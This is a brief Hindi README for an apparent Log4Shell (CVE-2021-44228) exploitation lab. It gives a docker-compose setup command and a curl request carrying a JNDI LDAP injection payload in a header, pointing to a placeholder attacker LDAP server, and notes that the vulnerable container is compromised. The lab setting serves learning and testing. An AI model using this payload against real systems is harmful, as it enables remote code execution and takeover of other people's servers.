
CVE-2021-44228
यह रिपॉजिटरी log4shell शोषण प्रयोगशाला के लिए एकल-पंक्ति सेटअप है।
प्रयोगशाला सेटअप करें: docker-compose up -d
शोषण चलाएँ: curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"
फिर vul कंटेनर पर जाएँ और देखें कि हमने वास्तव में मशीन को पकड़ लिया है:
